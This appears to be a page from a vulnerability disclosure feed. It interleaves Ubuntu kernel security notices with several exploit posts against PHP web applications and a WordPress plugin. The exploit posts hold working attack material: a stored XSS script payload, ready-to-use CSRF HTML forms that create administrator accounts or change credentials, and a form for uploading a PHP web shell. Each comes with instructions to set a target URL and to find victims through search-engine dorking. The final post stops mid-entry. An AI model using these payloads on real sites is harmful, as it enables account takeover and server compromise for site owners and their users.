WordPress PVN Auth Popup plugin version 1.0.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PVN Auth Popup <= 1.0.0 - Admin+ Stored XSS# Date: 08-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/pvn-auth-popup/# Version: <= 1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some of its settings, which couldallow high privilege users such as admin to perform Stored Cross-SiteScripting attacks even when the unfiltered_html capability is disallowed(for example in multisite setup)Proof of Concept1. Go to https://example.com/wp-admin/admin.php?page=pvn_auth_popup2. In the first section, enter the payload `"><script>alert(1)</script>`for the "Login text" input3. Save and see the XSSNote: Other fields are likely vulnerableReference:https://wpscan.com/vulnerability/24685b19-0a44-411a-9e1b-d4d0627d7cb6/

WordPress PVN Auth Popup 1.0.0 Cross Site Scripting

Ubuntu Security Notice 6956-1 - Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shinde discovered that an untrusted hypervisor could inject malicious #VC interrupts and compromise the security guarantees of AMD SEV-SNP. This flaw is known as WeSee. A local attacker in control of the hypervisor could use this to expose sensitive information or possibly execute arbitrary code in the trusted execution environment. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6956-1August 12, 2024linux-azure, linux-azure-5.15, linux-azure-fde, linux-azure-fde-5.15vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shindediscovered that an untrusted hypervisor could inject malicious #VCinterrupts and compromise the security guarantees of AMD SEV-SNP. This flawis known as WeSee. A local attacker in control of the hypervisor could usethis to expose sensitive information or possibly execute arbitrary code inthe trusted execution environment. (CVE-2024-25742)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - TTY drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36933, CVE-2024-36960, CVE-2024-26936, CVE-2024-36975,CVE-2023-52882, CVE-2024-27401, CVE-2024-36929, CVE-2024-36939,CVE-2024-35947, CVE-2024-36883, CVE-2024-26886, CVE-2024-36952,CVE-2024-36950, CVE-2024-36940, CVE-2024-36897, CVE-2023-52585,CVE-2024-26900, CVE-2024-36959, CVE-2024-36928, CVE-2024-36938,CVE-2024-36016, CVE-2024-36965, CVE-2024-36967, CVE-2024-36889,CVE-2024-36905, CVE-2024-36969, CVE-2024-36916, CVE-2024-36954,CVE-2024-27017, CVE-2024-36941, CVE-2024-36957, CVE-2024-27399,CVE-2024-36937, CVE-2024-36955, CVE-2024-38600, CVE-2023-52752,CVE-2024-36953, CVE-2024-26980, CVE-2024-36902, CVE-2024-26952,CVE-2024-36904, CVE-2024-36964, CVE-2024-36946, CVE-2024-36880,CVE-2024-36906, CVE-2024-36947, CVE-2024-36886, CVE-2024-36934,CVE-2024-35848, CVE-2024-36919, CVE-2024-36017, CVE-2024-36944,CVE-2024-36931, CVE-2024-27398)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1070-azure   5.15.0-1070.79   linux-image-5.15.0-1070-azure-fde  5.15.0-1070.79.1   linux-image-azure-fde-lts-22.04  5.15.0.1070.79.47   linux-image-azure-lts-22.04     5.15.0.1070.68Ubuntu 20.04 LTS   linux-image-5.15.0-1070-azure   5.15.0-1070.79~20.04.1   linux-image-5.15.0-1070-azure-fde  5.15.0-1070.79~20.04.1.1   linux-image-azure               5.15.0.1070.79~20.04.1   linux-image-azure-cvm           5.15.0.1070.79~20.04.1   linux-image-azure-fde           5.15.0.1070.79~20.04.1.47After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6956-1   CVE-2023-52585, CVE-2023-52752, CVE-2023-52882, CVE-2024-25742,   CVE-2024-26886, CVE-2024-26900, CVE-2024-26936, CVE-2024-26952,   CVE-2024-26980, CVE-2024-27017, CVE-2024-27398, CVE-2024-27399,   CVE-2024-27401, CVE-2024-35848, CVE-2024-35947, CVE-2024-36016,   CVE-2024-36017, CVE-2024-36880, CVE-2024-36883, CVE-2024-36886,   CVE-2024-36889, CVE-2024-36897, CVE-2024-36902, CVE-2024-36904,   CVE-2024-36905, CVE-2024-36906, CVE-2024-36916, CVE-2024-36919,   CVE-2024-36928, CVE-2024-36929, CVE-2024-36931, CVE-2024-36933,   CVE-2024-36934, CVE-2024-36937, CVE-2024-36938, CVE-2024-36939,   CVE-2024-36940, CVE-2024-36941, CVE-2024-36944, CVE-2024-36946,   CVE-2024-36947, CVE-2024-36950, CVE-2024-36952, CVE-2024-36953,   CVE-2024-36954, CVE-2024-36955, CVE-2024-36957, CVE-2024-36959,   CVE-2024-36960, CVE-2024-36964, CVE-2024-36965, CVE-2024-36967,   CVE-2024-36969, CVE-2024-36975, CVE-2024-38600Package Information:   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1070.79   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1070.79.1   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1070.79~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1070.79~20.04.1.1

Ubuntu Security Notice USN-6956-1

Giftora version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Giftora V 1.0 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML Add New posts .

[+] Go to the line 10. Set the target site link Save changes and apply . 

[+] infected file :  /admincp/new-post.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://127.0.0.1/giftora.webister.net/admincp/controllers/submit_post" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>  
[+] demo https://127.0.0.1/giftora.webister.net/blog

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Giftora 1.0 Cross Site Request Forgery

Gas Agency Management version 2022 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Gas Agency Management 2022 Remote File Upload Vulnerability                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : gasmark/manage_website.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="ar">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushak was here</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/gasmark/manage_website.php" method="POST" enctype="multipart/form-data">  
               <input type="hidden" name="old_website_image" value="old_website_image.jpg">  
        <label for="website_image">S0M3 ThING baD:</label>  
        <input type="file" name="website_image" id="website_image"><br><br>

        <input type="submit" name="btn_web" value="do !T">  
    </form>  
</body>  
</html>

[+] Path : http://127.0.0.1/gasmark/assets/uploadImage/Logo/ev!l.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Gas Agency Management 2022 Shell Upload

Ubuntu Security Notice 6955-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6955-1August 12, 2024linux-oem-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oem-6.8: Linux kernel for OEM systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - M68K architecture;   - OpenRISC architecture;   - PowerPC architecture;   - RISC-V architecture;   - x86 architecture;   - Block layer subsystem;   - Accessibility subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - DMA engine subsystem;   - DPLL subsystem;   - FireWire subsystem;   - EFI core;   - Qualcomm firmware drivers;   - GPIO subsystem;   - GPU drivers;   - Microsoft Hyper-V drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - IRQ chip drivers;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - EEPROM drivers;   - MMC subsystem;   - Network drivers;   - STMicroelectronics network drivers;   - Device tree and open firmware driver;   - HiSilicon SoC PMU drivers;   - PHY drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - SPI subsystem;   - Media staging drivers;   - Thermal drivers;   - Userspace I/O drivers;   - USB subsystem;   - DesignWare USB3 driver;   - ACRN Hypervisor Service Module driver;   - Virtio drivers;   - 9P distributed file system;   - BTRFS file system;   - eCrypt file system;   - EROFS file system;   - File systems infrastructure;   - GFS2 file system;   - JFFS2 file system;   - Network file systems library;   - Network file system client;   - Network file system server daemon;   - NILFS2 file system;   - Proc file system;   - SMB network file system;   - Tracing file system;   - Mellanox drivers;   - Memory management;   - Socket messages infrastructure;   - Slab allocator;   - Tracing infrastructure;   - User-space API (UAPI);   - Core kernel;   - BPF subsystem;   - DMA mapping infrastructure;   - RCU subsystem;   - Dynamic debug library;   - KUnit library;   - Maple Tree data structure library;   - Heterogeneous memory management;   - Amateur Radio drivers;   - Bluetooth subsystem;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - SMC sockets;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;   - Kirkwood ASoC drivers;   - MediaTek ASoC drivers;(CVE-2024-35987, CVE-2024-36931, CVE-2024-38614, CVE-2024-35857,CVE-2024-36949, CVE-2024-38599, CVE-2024-35994, CVE-2024-35849,CVE-2024-36916, CVE-2024-38590, CVE-2024-36944, CVE-2024-38561,CVE-2024-38538, CVE-2024-36017, CVE-2024-38593, CVE-2024-36028,CVE-2024-36960, CVE-2024-36002, CVE-2024-36967, CVE-2024-36898,CVE-2024-35989, CVE-2024-36975, CVE-2024-38578, CVE-2024-38582,CVE-2024-38588, CVE-2024-38579, CVE-2024-38617, CVE-2024-36901,CVE-2024-38550, CVE-2023-52882, CVE-2024-38603, CVE-2024-38620,CVE-2024-36956, CVE-2024-36880, CVE-2024-36895, CVE-2024-36979,CVE-2024-36887, CVE-2024-27396, CVE-2024-27400, CVE-2024-36952,CVE-2024-36886, CVE-2024-36905, CVE-2024-36883, CVE-2024-38540,CVE-2024-38605, CVE-2024-36029, CVE-2024-36934, CVE-2024-27395,CVE-2024-36000, CVE-2024-38549, CVE-2024-35999, CVE-2024-38585,CVE-2024-38589, CVE-2024-38565, CVE-2024-36917, CVE-2024-36930,CVE-2024-36940, CVE-2024-36900, CVE-2024-35850, CVE-2024-38592,CVE-2024-38553, CVE-2024-36929, CVE-2024-36915, CVE-2024-36004,CVE-2024-38573, CVE-2024-36941, CVE-2024-38607, CVE-2024-36009,CVE-2024-27398, CVE-2024-36909, CVE-2024-35848, CVE-2024-36950,CVE-2024-38564, CVE-2024-36947, CVE-2024-38613, CVE-2024-38570,CVE-2024-38612, CVE-2024-38580, CVE-2024-38557, CVE-2024-36959,CVE-2024-27399, CVE-2024-41011, CVE-2024-36928, CVE-2024-38543,CVE-2024-38541, CVE-2024-38583, CVE-2024-35855, CVE-2024-38611,CVE-2024-36891, CVE-2024-38587, CVE-2024-35851, CVE-2024-38546,CVE-2024-38596, CVE-2024-35998, CVE-2024-35991, CVE-2024-36965,CVE-2024-36925, CVE-2024-36894, CVE-2024-38567, CVE-2024-38572,CVE-2024-36882, CVE-2024-38594, CVE-2024-38563, CVE-2024-38616,CVE-2024-36951, CVE-2024-36005, CVE-2024-42134, CVE-2024-38602,CVE-2024-36014, CVE-2024-38601, CVE-2024-36001, CVE-2024-38575,CVE-2024-27401, CVE-2024-36961, CVE-2024-38576, CVE-2024-36935,CVE-2024-36893, CVE-2024-38562, CVE-2024-36904, CVE-2024-36939,CVE-2024-38591, CVE-2024-38539, CVE-2024-36030, CVE-2024-36920,CVE-2024-39482, CVE-2024-36977, CVE-2024-36013, CVE-2024-35856,CVE-2024-36922, CVE-2024-36033, CVE-2024-35859, CVE-2024-36919,CVE-2024-35846, CVE-2024-36913, CVE-2024-35854, CVE-2024-36924,CVE-2024-38547, CVE-2024-38551, CVE-2024-36899, CVE-2024-36932,CVE-2024-38545, CVE-2024-36966, CVE-2024-36911, CVE-2024-36946,CVE-2024-36906, CVE-2024-38595, CVE-2024-36012, CVE-2024-38552,CVE-2024-36933, CVE-2024-36936, CVE-2024-38548, CVE-2024-38558,CVE-2024-36006, CVE-2024-36908, CVE-2024-36892, CVE-2024-35988,CVE-2024-35993, CVE-2024-36914, CVE-2024-36896, CVE-2024-38615,CVE-2024-36890, CVE-2024-36969, CVE-2024-38559, CVE-2024-36964,CVE-2024-38560, CVE-2024-38574, CVE-2024-36962, CVE-2024-38542,CVE-2024-36926, CVE-2024-36968, CVE-2024-36032, CVE-2024-38544,CVE-2024-36938, CVE-2024-38597, CVE-2024-38577, CVE-2024-36958,CVE-2024-36945, CVE-2024-36943, CVE-2024-38610, CVE-2024-36927,CVE-2024-38554, CVE-2024-38555, CVE-2024-36031, CVE-2024-36011,CVE-2024-38569, CVE-2024-35847, CVE-2024-36921, CVE-2024-38606,CVE-2024-35949, CVE-2024-35947, CVE-2024-36889, CVE-2024-36884,CVE-2024-36954, CVE-2024-36902, CVE-2024-36007, CVE-2024-38586,CVE-2024-36918, CVE-2024-38571, CVE-2024-36955, CVE-2024-36888,CVE-2024-38556, CVE-2024-38604, CVE-2024-27394, CVE-2024-38600,CVE-2024-35983, CVE-2024-38568, CVE-2024-38566, CVE-2024-35853,CVE-2024-35858, CVE-2024-36910, CVE-2024-36903, CVE-2024-36881,CVE-2024-36937, CVE-2024-36957, CVE-2024-36912, CVE-2024-36948,CVE-2024-36953, CVE-2024-35996, CVE-2024-36963, CVE-2024-36923,CVE-2024-35852, CVE-2024-38598, CVE-2024-36003, CVE-2024-35986,CVE-2024-38584)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1010-oem      6.8.0-1010.10   linux-image-oem-24.04           6.8.0-1010.10   linux-image-oem-24.04a          6.8.0-1010.10After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6955-1   CVE-2023-52882, CVE-2024-27394, CVE-2024-27395, CVE-2024-27396,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27400, CVE-2024-27401,   CVE-2024-35846, CVE-2024-35847, CVE-2024-35848, CVE-2024-35849,   CVE-2024-35850, CVE-2024-35851, CVE-2024-35852, CVE-2024-35853,   CVE-2024-35854, CVE-2024-35855, CVE-2024-35856, CVE-2024-35857,   CVE-2024-35858, CVE-2024-35859, CVE-2024-35947, CVE-2024-35949,   CVE-2024-35983, CVE-2024-35986, CVE-2024-35987, CVE-2024-35988,   CVE-2024-35989, CVE-2024-35991, CVE-2024-35993, CVE-2024-35994,   CVE-2024-35996, CVE-2024-35998, CVE-2024-35999, CVE-2024-36000,   CVE-2024-36001, CVE-2024-36002, CVE-2024-36003, CVE-2024-36004,   CVE-2024-36005, CVE-2024-36006, CVE-2024-36007, CVE-2024-36009,   CVE-2024-36011, CVE-2024-36012, CVE-2024-36013, CVE-2024-36014,   CVE-2024-36017, CVE-2024-36028, CVE-2024-36029, CVE-2024-36030,   CVE-2024-36031, CVE-2024-36032, CVE-2024-36033, CVE-2024-36880,   CVE-2024-36881, CVE-2024-36882, CVE-2024-36883, CVE-2024-36884,   CVE-2024-36886, CVE-2024-36887, CVE-2024-36888, CVE-2024-36889,   CVE-2024-36890, CVE-2024-36891, CVE-2024-36892, CVE-2024-36893,   CVE-2024-36894, CVE-2024-36895, CVE-2024-36896, CVE-2024-36898,   CVE-2024-36899, CVE-2024-36900, CVE-2024-36901, CVE-2024-36902,   CVE-2024-36903, CVE-2024-36904, CVE-2024-36905, CVE-2024-36906,   CVE-2024-36908, CVE-2024-36909, CVE-2024-36910, CVE-2024-36911,   CVE-2024-36912, CVE-2024-36913, CVE-2024-36914, CVE-2024-36915,   CVE-2024-36916, CVE-2024-36917, CVE-2024-36918, CVE-2024-36919,   CVE-2024-36920, CVE-2024-36921, CVE-2024-36922, CVE-2024-36923,   CVE-2024-36924, CVE-2024-36925, CVE-2024-36926, CVE-2024-36927,   CVE-2024-36928, CVE-2024-36929, CVE-2024-36930, CVE-2024-36931,   CVE-2024-36932, CVE-2024-36933, CVE-2024-36934, CVE-2024-36935,   CVE-2024-36936, CVE-2024-36937, CVE-2024-36938, CVE-2024-36939,   CVE-2024-36940, CVE-2024-36941, CVE-2024-36943, CVE-2024-36944,   CVE-2024-36945, CVE-2024-36946, CVE-2024-36947, CVE-2024-36948,   CVE-2024-36949, CVE-2024-36950, CVE-2024-36951, CVE-2024-36952,   CVE-2024-36953, CVE-2024-36954, CVE-2024-36955, CVE-2024-36956,   CVE-2024-36957, CVE-2024-36958, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36961, CVE-2024-36962, CVE-2024-36963, CVE-2024-36964,   CVE-2024-36965, CVE-2024-36966, CVE-2024-36967, CVE-2024-36968,   CVE-2024-36969, CVE-2024-36975, CVE-2024-36977, CVE-2024-36979,   CVE-2024-38538, CVE-2024-38539, CVE-2024-38540, CVE-2024-38541,   CVE-2024-38542, CVE-2024-38543, CVE-2024-38544, CVE-2024-38545,   CVE-2024-38546, CVE-2024-38547, CVE-2024-38548, CVE-2024-38549,   CVE-2024-38550, CVE-2024-38551, CVE-2024-38552, CVE-2024-38553,   CVE-2024-38554, CVE-2024-38555, CVE-2024-38556, CVE-2024-38557,   CVE-2024-38558, CVE-2024-38559, CVE-2024-38560, CVE-2024-38561,   CVE-2024-38562, CVE-2024-38563, CVE-2024-38564, CVE-2024-38565,   CVE-2024-38566, CVE-2024-38567, CVE-2024-38568, CVE-2024-38569,   CVE-2024-38570, CVE-2024-38571, CVE-2024-38572, CVE-2024-38573,   CVE-2024-38574, CVE-2024-38575, CVE-2024-38576, CVE-2024-38577,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38580, CVE-2024-38582,   CVE-2024-38583, CVE-2024-38584, CVE-2024-38585, CVE-2024-38586,   CVE-2024-38587, CVE-2024-38588, CVE-2024-38589, CVE-2024-38590,   CVE-2024-38591, CVE-2024-38592, CVE-2024-38593, CVE-2024-38594,   CVE-2024-38595, CVE-2024-38596, CVE-2024-38597, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38602,   CVE-2024-38603, CVE-2024-38604, CVE-2024-38605, CVE-2024-38606,   CVE-2024-38607, CVE-2024-38610, CVE-2024-38611, CVE-2024-38612,   CVE-2024-38613, CVE-2024-38614, CVE-2024-38615, CVE-2024-38616,   CVE-2024-38617, CVE-2024-38620, CVE-2024-39482, CVE-2024-41011,   CVE-2024-42134Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1010.10

Ubuntu Security Notice USN-6955-1

Farmacia Gama version 1.0 Farmacia Gama version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Farmacia Gama v1.0 v1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code add new admin .

[+] Go to the line 10 Set the target site link Save changes and apply . 

[+] infected file : /main.php.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Farmacia Form</title>  
</head>  
<body>  
    <h2>Farmacia User Form</h2>  
    <form action="http://127.0.0.1/farmacia-master/main.php" method="POST">  
        <label for="nome">Nome:</label>  
        <input type="text" id="nome" name="nome" required><br><br>

        <label for="cargo">Cargo:</label>  
        <input type="text" id="cargo" name="cargo" required><br><br>

        <label for="usuario">Usuário:</label>  
        <input type="text" id="usuario" name="usuario" required><br><br>

        <label for="senha">Senha:</label>  
        <input type="password" id="senha" name="senha" required><br><br>

        <button type="submit" name="acao">Submit</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Farmacia Gama 1.0 Farmacia Gama 1.0 Cross Site Request Forgery

Employees Pay Slip PDF Generator System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Employees Pay Slip PDF Generator System 1.0 CSRF Vulnerability                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip                                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/pess/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Employees Pay Slip PDF Generator System 1.0 Cross Site Request Forgery

Bakery Shop Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Bakery Shop Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_0.zip                                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML code :

 represents a simple user form that collects data for a user (like a username, password, and user type) and submits it to a server using AJAX.   
 Let me break down the key components of this code:

 [+] HTML Structure

    Container & Form:

          <div class="container-fluid">: This div serves as a container for the form and ensures that it will take up the full width of its parent container.  
        <form action="" id="user-form">: This form collects user data. The action attribute is empty,   
    meaning the form doesn't submit in the traditional way (it's handled via JavaScript instead).

    Hidden Input:  
        <input type="hidden" name="id" value="">: This hidden input is used to store the user ID. It might be used for editing an existing user where the user ID   
    is sent back to the server but isn't visible to the user.

[+] Form Fields:

    Full Name:

        <label for="fullname" class="control-label">Username</label>  
    <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">

    This field is actually mislabeled—the label says "Username," but the input is for the user's full name.   
  The input field is styled using Bootstrap classes.

    Username:

    <label for="username" class="control-label">Password</label>  
    <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">

[+] Similarly, this field is labeled as "Password," but the input is meant for the username. The input type should be password instead of text for security reasons.

[+] User Type:

        <label for="type" class="control-label">Type</label>  
        <select name="type" id="type" class="form-select form-select-sm rounded-0" required>  
            <option value="1">Administrator</option>  
            <option value="0">Cashier</option>  
        </select>

        This dropdown allows the user to select their type—either "Administrator" or "Cashier." The selected value (1 or 0) is sent to the server.

[+] Submit Button: 

        <button type="submit" class="btn btn-primary">Save</button>: This button submits the form. It's styled as a primary button using Bootstrap.

[+] JavaScript (jQuery)

    Form Submission Handling:  
        $(function(){ ... }): This is a jQuery shorthand for $(document).ready(), meaning the function runs after the DOM is fully loaded.  
        $('#user-form').submit(function(e){ ... }): This function handles the form submission.   
    The default form submission behavior is prevented (e.preventDefault()), meaning the form doesn't reload the page.

    Message Handling:  
        $('.pop_msg').remove();: This removes any previous pop-up messages before submitting the form.  
        _el.addClass('pop_msg'): Creates a new element for displaying messages (e.g., success or error messages).

    AJAX Request:  
        $.ajax({ ... }): Sends the form data to the server without reloading the page.  
            URL: The form is submitted to http://127.0.0.1/bsms/Actions.php?a=save_user.  
            Method: The data is sent using the POST method.  
            Data: The form data is serialized (_this.serialize()) and sent as JSON.  
            Error Handling:  
                If an error occurs, the script logs it to the console and displays an error message (which currently says "Yes Mother fucker !"  
        —this is an inappropriate message and should be corrected to something like "An error occurred.").  
            Success Handling:  
                If the submission is successful, the form is reset, a success message is shown, and the page may reload after a short delay.  
                If the submission fails, the error message from the server response is displayed.

  [+] Line 36 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="container-fluid">  
    <form action="" id="user-form">  
        <input type="hidden" name="id" value="">  
        <div class="form-group">  
            <label for="fullname" class="control-label">Username</label>  
            <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">  
        </div>  
        <div class="form-group">  
            <label for="username" class="control-label">Password</label>  
            <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">  
        </div>  
        <div class="form-group">  
            <label for="type" class="control-label">Type</label>  
            <select name="type" id="type" class="form-select form-select-sm rounded-0" required>  
                <option value="1">Administrator</option>  
                <option value="0">Cashier</option>  
            </select>  
        </div>  
        <button type="submit" class="btn btn-primary">Save</button>  
    </form>  
</div>

